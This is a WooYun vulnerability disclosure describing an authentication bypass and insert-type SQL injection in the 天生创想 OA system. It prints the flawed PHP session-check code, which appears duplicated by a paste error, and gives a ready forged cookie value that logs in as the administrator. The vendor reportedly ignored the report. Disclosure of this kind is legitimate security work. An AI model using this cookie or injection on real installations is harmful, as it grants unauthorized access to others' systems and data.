当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-043578

漏洞标题:天生创想oa任意用户登陆包括管理员

相关厂商:天生创想

漏洞作者: 句子

提交时间:2013-11-21 12:48

修复时间:2014-02-19 12:49

公开时间:2014-02-19 12:49

漏洞类型:非授权访问/权限绕过

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-11-21: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-02-19: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

天生创想oa任意用户登陆,包括管理员,附加一枚注入

详细说明:

function check_user() { 
		if ( !$auth = get_cookie('auth') ) return false;
		list($uid, $password ) = explode("\t", authcode($auth, 'DECODE'));
		#echo 'uid='.$uid."||password=".$password;
		if (is_numeric($uid)){
			$sql = "SELECT * FROM ".DB_TABLEPRE."session WHERE uid = '$uid' AND password = '".addslashes($password)."'";
			#echo $sql;
			if ( $result = $this->db->fetch_one_array($sql) ) { 
				$this->id = $result['uid'];
				$this->name = addslashes($result['username']);
				$this->groupid = $result['groupid'];
			}else { 
				$sql = "SELECT id AS uid,username,password,groupid,userkey FROM ".DB_TABLEPRE."user WHERE ischeck = 1 AND id = '$uid'";
				
				if ( $result = $this->db->fetch_one_array($sql) ) {
					$this->id = $result['uid'];
					$this->name = addslashes($result['username']);
					$this->groupid = $result['groupid'];
					$result['password'] = $password;
					unset($result['userkey']);
					$this->add_session($result);
				}
			}
		}
		if (!$this->id ) {
			$this->logout();
		}
		function check_user() { 
		if ( !$auth = get_cookie('auth') ) return false;
		list($uid, $password ) = explode("\t", authcode($auth, 'DECODE'));
		#echo 'uid='.$uid."||password=".$password;
		if (is_numeric($uid)){
			$sql = "SELECT * FROM ".DB_TABLEPRE."session WHERE uid = '$uid' AND password = '".addslashes($password)."'";
			#echo $sql;
			if ( $result = $this->db->fetch_one_array($sql) ) { 
				$this->id = $result['uid'];
				$this->name = addslashes($result['username']);
				$this->groupid = $result['groupid'];
			}else { 
				$sql = "SELECT id AS uid,username,password,groupid,userkey FROM ".DB_TABLEPRE."user WHERE ischeck = 1 AND id = '$uid'";
				
				if ( $result = $this->db->fetch_one_array($sql) ) {
					$this->id = $result['uid'];
					$this->name = addslashes($result['username']);
					$this->groupid = $result['groupid'];
					$result['password'] = $password;
					unset($result['userkey']);
					$this->add_session($result);
				}
			}
		}
		if (!$this->id ) {
			$this->logout();
		}
		
	}
	}


流程上,查询失败时,更新外部输入的密码,插入数据库中,保存的会话表内
流程访问:http://127.0.0.1/home.php
添加cookie:toa_auth=MQkzMzMzMzM=
成功登陆至设备。
同事,$password 是base64解码输入,未作过滤,存在insert型的sql注入

漏洞证明:

1.png


流程访问:http://127.0.0.1/home.php
添加cookie:toa_auth=MQkzMzMzMzM=
再次访问,就进入系统了

修复方案:

奇葩的逻辑,修复你们自己懂的

版权声明:转载请注明来源 句子@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝